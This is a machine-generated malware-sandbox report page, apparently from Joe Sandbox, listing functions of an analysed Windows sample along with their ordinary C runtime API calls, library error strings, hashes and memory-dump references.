Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: memset
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_replace_aux$basic_string::insert
API String ID: 2221118986-1339558951
Opcode ID: 74562d46386fd63819a959bc83f06668e156f199f347d07823fb839092a98177
Instruction ID: f828e702d77d1a92cee4c8089e6dc6b0f52d8d0ca54764c21db119ae25b0d960
Opcode Fuzzy Hash: 74562d46386fd63819a959bc83f06668e156f199f347d07823fb839092a98177
Instruction Fuzzy Hash: D531E762F09B4782FB24AB66AC504BDA311EB55FD0FC84672DF0D17781EE2CE5918B60

Function 00007FF729F9C3B3 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF729F8DD2B), ref: 00007FF729F9C418
realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF729F9C453

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: e22b0e94a47a8450984afe8f512c6dad40a064425027682d979066751d6fcd15
Instruction ID: 6f46eb382123455692acfc90ac966ea4b4445c675f5cabae5f9797681005034f
Opcode Fuzzy Hash: e22b0e94a47a8450984afe8f512c6dad40a064425027682d979066751d6fcd15
Instruction Fuzzy Hash: 5E51DC76B10B15CAEB40DFADD8843AC37B1FB48B88F544825DE1CA7769DE38D6518720

Function 00007FF729FA41F0 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c0842d67d3aca682af4ea24a3bfdcfe7c8510fcd7310f591c4ee2ea2d933f75
Instruction ID: 70675977ab6c544096e918b9ceeeb8c7f905698d433c18611d195aef7b0fe0cd
Opcode Fuzzy Hash: 2c0842d67d3aca682af4ea24a3bfdcfe7c8510fcd7310f591c4ee2ea2d933f75
Instruction Fuzzy Hash: B221AD50E9C20740FBB47B6A6C562BDD2A2EF06B84FC81471DD1D422CBAE1CA6426E31

Function 00007FF729F91ED2 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729F91EFF
localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF729F91F04
memset.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729F91FA8
wcrtomb.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF729F91FC6

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: memset$localeconvwcrtomb
String ID:
API String ID: 760488717-0
Opcode ID: 37cf315cdfffd00a87d5797bc9dbdd676c9d1ec89dc6de8e3d34f7b9edef8016
Instruction ID: 1e910166a648e71b3ae5f654ab5b984d64562fd4334218b9d9da2b8978a964f0
Opcode Fuzzy Hash: 37cf315cdfffd00a87d5797bc9dbdd676c9d1ec89dc6de8e3d34f7b9edef8016
Instruction Fuzzy Hash: DD416926B15A498AFB50EF65C8402EC77B0EB48B8CF844136EE4C57B99DE38D700DB60

Function 00007FF729FEA530 Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF729FEA561
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF729FEA5BC
wcrtomb.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF729FEA5E5
wcrtomb.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF729FEA65E

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: wcrtomb$___mb_cur_max_funcmemcpy
String ID:
API String ID: 4290179537-0
Opcode ID: 1455c9973fed2b73475f62c441def735ec188d9342aba904070f6072e9a62b4e
Instruction ID: 987882d1122b6877965de021bfcc8256cb0c6c845f792c44b24d5d524a087482
Opcode Fuzzy Hash: 1455c9973fed2b73475f62c441def735ec188d9342aba904070f6072e9a62b4e
Instruction Fuzzy Hash: BE31E862B0979540ED606F15AC042AAE365EB46BF8F8D4231DDAC077D4DE3CD282EB10

Function 00007FF729FD5CF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FD5D10
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FD5D60

Strings

basic_string: construction from null is not valid, xrefs: 00007FF729FD5D2E, 00007FF729FD5D7E, 00007FF729FD5DCE

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid
API String ID: 39653677-2991274800
Opcode ID: 3955ff3e0dbcfad3a83788aa7ea374c0f2f0b6e854dd9ac53371bf832e8fac1e
Instruction ID: c00be85e66a818f9cee36348ec25ac1a58765030070ba13ff37771c6697519a5
Opcode Fuzzy Hash: 3955ff3e0dbcfad3a83788aa7ea374c0f2f0b6e854dd9ac53371bf832e8fac1e
Instruction Fuzzy Hash: 70218762B59B1641EE65BF1AEC400ECA321EF48F84BD84472DD0D0B765EE2CD647D720

Function 00007FF72A025220 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,00007FF729FCE1BE), ref: 00007FF72A025291
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,00007FF729FCE1BE), ref: 00007FF72A0252C7

Strings

basic_string::assign, xrefs: 00007FF72A02532A

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: memcpy
String ID: basic_string::assign
API String ID: 3510742995-2385367300
Opcode ID: c8fc347fe4dc6b50cfa60ce8fb20a7232c0867b0e7dfa4c159f5fef8c1d2d6e1
Instruction ID: 1347c2acf0db89baf37b4fe600d4f83b963a18ed16c3507d3df4e887e50779ed
Opcode Fuzzy Hash: c8fc347fe4dc6b50cfa60ce8fb20a7232c0867b0e7dfa4c159f5fef8c1d2d6e1
Instruction Fuzzy Hash: 7C21A222B0978241FF21AB5A9A542BCD6A1DB4ABD0FD88171CF4C473D1FE6CE5458724

Function 00007FF72A033C10 Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF72A033860: _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A071C77), ref: 00007FF72A033867

_write.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF72A033C61
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF72A033C6F
_write.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF72A033CC0
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF72A033CCE

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: _errno_write$_fileno
String ID:
API String ID: 3341061957-0
Opcode ID: 56187e0759bf5027526d8ec828883573ff23af89730765816de1fcc49bc6beb3
Instruction ID: 6d06aa5c836afb5e1184725ac1d02662bb1b24b1ed04c89d5882ff6d29ae1220
Opcode Fuzzy Hash: 56187e0759bf5027526d8ec828883573ff23af89730765816de1fcc49bc6beb3
Instruction Fuzzy Hash: F111CD12F2965355FA613B266E8407AC190AF89BE4FD841B1ED0C4B7C0FD3CE841AB21

Function 00007FF72A0B44C0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 72stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF72A0B44DA
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF72A0B4546

Strings

basic_string::_S_construct null not valid, xrefs: 00007FF72A0B4577
basic_ios::clear, xrefs: 00007FF72A0B44C2

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: memcpystrlen
String ID: basic_ios::clear$basic_string::_S_construct null not valid
API String ID: 3412268980-3371637893
Opcode ID: d2775fc198d7616ba1de734a38b6a68c3bb9aa266471f42886164bc78b3fe207
Instruction ID: b3ded6a8069352c855a46af006ef05dcb56ad67f5262c5c204ddf14deff489c3
Opcode Fuzzy Hash: d2775fc198d7616ba1de734a38b6a68c3bb9aa266471f42886164bc78b3fe207
Instruction Fuzzy Hash: E2110322E09A0340FB26EB25AD003B89654DFA5BE4FC84570EE0D073CAFE2DD641CB60

Function 00007FF72A02F680 Relevance: 6.0, APIs: 4, Instructions: 30stringCOMMON

Download Yara Rule

APIs

setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FF72A0AFDB6), ref: 00007FF72A02F68B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF72A0AFDB6), ref: 00007FF72A02F696
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,00007FF72A0AFDB6), ref: 00007FF72A02F6BF
setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FF72A0AFDB6), ref: 00007FF72A02F6CD

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: d051b00df97e8cf62e9cc21fb80062fcd567f8e3d3914ad3ab052e50379fb1e5
Instruction ID: c67c08f6bcf3db512c6d505b77c40f19ad809cd7bae75d25164750ef81e39e27
Opcode Fuzzy Hash: d051b00df97e8cf62e9cc21fb80062fcd567f8e3d3914ad3ab052e50379fb1e5
Instruction Fuzzy Hash: E0F0A751B0964340FF68BB671D161BD8252DF45BC0BD88075DC0D0B386ED2CE2424720

Function 00007FF729F8D5E0 Relevance: 6.0, APIs: 4, Instructions: 24COMMON

Download Yara Rule

APIs

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF72A0C7660
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF72A0C7666
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF72A0C7670
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF72A0C7676

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 3d7603118a15bb94b592a687338a59a4fe1b005e5225d0ffd3fd536b333e74bf
Instruction ID: 2f0fa0db55b5954a9ab2263612386af89fdd1d46d4d9112a0796c9ee2e2191b5
Opcode Fuzzy Hash: 3d7603118a15bb94b592a687338a59a4fe1b005e5225d0ffd3fd536b333e74bf
Instruction Fuzzy Hash: 8CD0C990EAE503A1F9943B1E4DEA8BEC026EF06790FE85D70E00D842D39E1C73512DA8

Function 00007FF72A03AE40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

basic_filebuf::xsgetn error reading the file, xrefs: 00007FF72A03B063

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID: basic_filebuf::xsgetn error reading the file
API String ID: 0-3108371566
Opcode ID: 0927fc067ebb6a33a96917f8bfe3f6ce7f7df60c436a53950f08f1643c458f46
Instruction ID: 36c2d4d947826b7465fedf999df47deeeff2085806a691b3cb51f366d8c036a0
Opcode Fuzzy Hash: 0927fc067ebb6a33a96917f8bfe3f6ce7f7df60c436a53950f08f1643c458f46
Instruction Fuzzy Hash: 8051D652E0968686FB30AB36990436AA360FB55798F988371DB9D47791FF3DF081C710

Function 00007FF72A0620A0 Relevance: 5.3, APIs: 4, Instructions: 329stringCOMMON

Download Yara Rule

APIs

wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,?,00000000,?,?,00007FF729FE66E3), ref: 00007FF72A062108
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,?,00000000,?,?,00007FF729FE66E3), ref: 00007FF72A0621A3
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,?,00000000,?,?,00007FF729FE66E3), ref: 00007FF72A06223A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,?,00000000,?,?,00007FF729FE66E3), ref: 00007FF72A0622D0

Part of subcall function 00007FF729FC5010: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF72A03870F), ref: 00007FF729FC5045

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: wcslen$memcpystrlen
String ID:
API String ID: 3111578849-0
Opcode ID: 8466c03248fce341d6f402fef4940c8792933acd647fd675550dae08b1f2027a
Instruction ID: 92b54f9d4129541623b1505924817831a36a62b38b0b5c5ac32e2f6233b2fbf5
Opcode Fuzzy Hash: 8466c03248fce341d6f402fef4940c8792933acd647fd675550dae08b1f2027a
Instruction Fuzzy Hash: 1BE14E62B09A0681EB70EB19E84026DE361FB89FD4F904676EE6D47794EF3CD541CB20

Function 00007FF72A0618D0 Relevance: 5.3, APIs: 4, Instructions: 329stringCOMMON

Download Yara Rule

APIs

wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,?,00000000,?,?,00007FF729FE53D3), ref: 00007FF72A061938
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,?,00000000,?,?,00007FF729FE53D3), ref: 00007FF72A0619D3
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,?,00000000,?,?,00007FF729FE53D3), ref: 00007FF72A061A6A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,?,00000000,?,?,00007FF729FE53D3), ref: 00007FF72A061B00

Part of subcall function 00007FF729FC5010: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF72A03870F), ref: 00007FF729FC5045

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: wcslen$memcpystrlen
String ID:
API String ID: 3111578849-0
Opcode ID: 40fa9441f0a5e6aa4ba5114cb36ad53663e56333714fd54fd52ad1764e1b87f5
Instruction ID: c41f90f8fdbf30a713d3c6917c0b7b28af554b6e36c0f0208f6c9812065dc9e3
Opcode Fuzzy Hash: 40fa9441f0a5e6aa4ba5114cb36ad53663e56333714fd54fd52ad1764e1b87f5
Instruction Fuzzy Hash: 27E15E62B08A0781EB60EF19E84026DA371FB85FE8B904676EE5D47794EF3CD545CB20

Function 00007FF729F8C0F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729F8C1BF

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF729F8C1E4
Unknown error, xrefs: 00007FF729F8C18A

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
